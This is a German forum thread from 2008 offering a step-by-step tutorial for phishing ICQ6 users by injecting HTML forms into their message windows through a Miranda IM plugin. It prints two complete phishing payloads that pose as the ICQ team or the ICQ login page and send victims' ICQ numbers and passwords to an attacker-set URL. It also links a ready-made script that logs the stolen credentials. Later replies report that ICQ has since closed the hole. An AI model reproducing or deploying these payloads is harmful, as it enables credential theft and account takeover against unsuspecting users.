Vollständige Version anzeigen : [Hacking] ICQ6 - Professional Phising


B0B
08.01.2008, 18:32

Tach,

du liest gerade ein Tutorial über professionelles ICQ6 phishing.
Wieso professionell? Ganz einfach: Du kannst direkt in das Eingabefenster von ICQ6
Usern eine Phishingform einfügen.

Vorraussetzung:
- Etwas Hirn
- PHP-fähiger Space

Werkzeug:
- Miranda IM (Miranda IM - Download (;;;miranda-im~org/download/))
- ICQ+ Plugin/Mod (Miranda IM - Addons - Fusion Popup+ (;addons;miranda-im~org/details;php?action=viewfile&id=3764))
- Phisingscript (könnt selber eines erstellen oder meines nehmen: No File | xup~in (;;;xup~in/dl,10923165/phi_script;rar/))

Vorgehen:
1. Installiert Miranda und das Plugin.
2. Das Phisingscript auf den Server legen.
3. Ein "Opfer" suchen - wenn gefunden, dann rechtsklick und "send tzer" klicken.
4. Nun wählt ihr unten zuerst das gewünschte tzer aus (is eigentlich egal.;).
5. Wenn ihr das tzer ausgewählt habt, gebt ihr oben den "phisingcode" ein.

Der passende Code zu meinem Phisingscript:

</a><br><br><br><br><img src=;icq;com;idoo~com/icq;png border=0><br><br><font color=black>Sehr geehrter ICQ-User,<br><br>das ICQ-Team wird demn&auml;chst die Server bereinigen;<br>Somit werden alle alten und unbenutzten Accounts gel&ouml;scht;<br>Bitte beachten Sie, dass diese Bereinigung notwendig ist,<br>um die Servergeschwindigkeit aufrecht zu erhalten;<br>Um einer L&ouml;schung zu entgehen, m&uuml;ssen Sie Ihren Account best&auml;tigen!<br><br>Bitte beachten sie, dass sie diese Aufforderung zur Best&auml;tigung Ihres Accounts<br>nur <u>einmal</u> erhalten. Wenn Sie Ihren ICQ-Account nicht best&auml;tigen,<br>wird er zum 12;01;2008 unwiderruflich aus dem ICQ-Register gel&ouml;scht!<br><br>Um Ihren Account zu best&auml;tigen und somit eine L&ouml;schung auszuschlie&szlig;en,<br>m&uuml;ssen Sie unten Ihre ICQ-Daten eingeben und auf Best&auml;tigen klicken;<br><br>Wir bitten um Ihr Verst&auml;ndnis!<br><br><form action=*HIER DEINE URL* method=GET>Ihre ICQ-Nummer:<input type=text name=uin><br>Ihr ICQ-Passwort:<input type=password name=pass><br><input type=submit name=send value=Best&auml;tigen></form><br>Vielen Dank, <br><br>mit freundlichen Gr&uuml;&szlig;en,<br>das ICQ-Team</font>

Ein anderer, aber auch sehr seriös wirkender Code:

</a><link rel='STYLESHEET' type='text/css' href=';icq~com/karma/css/karma;css?v=2'><script src=';;;icq~com/karma/js/login_page;js' language='javascript' type='text/javascript'></script><form name='login' action=*HIER DEINE URL* method=GET><div class='d1-3'>You have been signed out of the ICQ Network, please log in:</div><div class='d1-4'><div class='d1-4-1'>ICQ Number or Email</div><div class='d1-4-2'>ICQ Password</div><div class='d1-4-3'><input type='text' name='uin' value='' class='d1-4-input' onkeydown='uin_field_change()'></div><div class='d1-4-4'><input type='password' name='pass' class='d1-4-input'></div><div class='d1-4-5'><input type='image' alt='Einloggen' src=';icq~com/karma/img/s_login;gif' border='0'></div><div class='d1-4-6'><input type='checkbox' class='d1-4-chk' id='rem' name='rem' value='1'><span class='d1-4-rem' onclick='remember_me_check()'>&nbsp;Remember me</span>&nbsp;<img src=';icq~com/karma/img/info;gif' title='More Info' class='d1-4-img' alt='' border='0' width='14' height='14' onclick=window;open(';;;icq~com/legal/legal_popup_message;html',null,'height=200,width=600,status=no,toolbar=no,m enubar=no,location=no')></div></div></form></div><div class='d1-1'><strong>Important! </strong>The ICQ staff will NEVER ask you for your password, so don't tell it to anyone!</div>

6. In diesen Codes müsst ihr nurnoch die Form "Action" ändern (momentan steht dort: "*HIER DEINE URL*"). Dort gebt ihr die url zum Phisingscript an (Achtung, ohne "").
7. Wenn ihr alles geändert habt, könnt ihr den Code in das erste tzer feld eingeben und verschicken.
8. Wenn der User genug dumm ist, gibt er sein passwort ein.
9. Die Daten werden mit Datum, Uhrzeit und IP in einer Textdatei beim Phisingscript gespeichert.

So das wars...


PS: Ich weiß damit wird Kiddies nur geholfen, aber mir war sehr langweilig. Ausserdem: Was will man schon mit ICQ Uins ?

Hardware Preisvergleich | Amazon Blitzangebote!

Videos zum Thema
Video Loading...
Fr3aKer
15.07.2008, 17:22

der link zu deinem ICQ+ Plugin ist tot


B0B
16.07.2008, 21:34

das ganze geht auch nichtmehr. sicherheitsloch wurde von icq nach sage und schreibe 4 monaten (oder wars noch länger?) gestopft!!


Ähnliche Themen zu [Hacking] ICQ6 - Professional Phising
  • Urteil: Kein Mitverschulden eines Phising-Opfers
    Das Opfer eines Phising-Angriffs hat gegenüber dem als Geldwäscher agierenden Mittelsmann einen Schadensersatzanspruch in Höhe des überwiesenen Geldbetrags. Dies entschied das Landgericht Köln mit Urteil vom 5. Dezember 2007 (Az. 9 S 195/07) und hob damit ein Urteil das AG Köln als Vorinstanz [...]

  • Software gegen Phising und Spam Mails
    Hi liebe RR'ler, ich habe bereits überall gesucht, GOOGLE, Boardsuche usw. Naja nichts gefunden, also folgendes: Ich habe einen E-Mail Account über das T-online Servicecenter, jedoch kommen da immer so viele spam und phising mails. Diese würde ich gern nicht mehr bekommen, d;h. ein Prog [...]

  • Phising versuch die 10. bei Steam
    Hey, ich wurde mal wieder bei Steam angeschrieben mit folgendem Satz: Hey Steam Feiert 10 Jähriges Jubiläum und hat zum fest des Tages 1000 Gold Uprates die Spiele im Wert von 20-30 € Besitzen zur Verlosung freigegeben : (;steampowerd;community~cm/) Schicke diesen Text an deine Freunde damit [...]

  • ICQ Phising Site
    Ich würde das als Hacking request ansehn. Aber wen du das für MSN schon hast, warum desingst du es nicht einfach um? [...]



raid-rush.ws | Imprint & Contact pr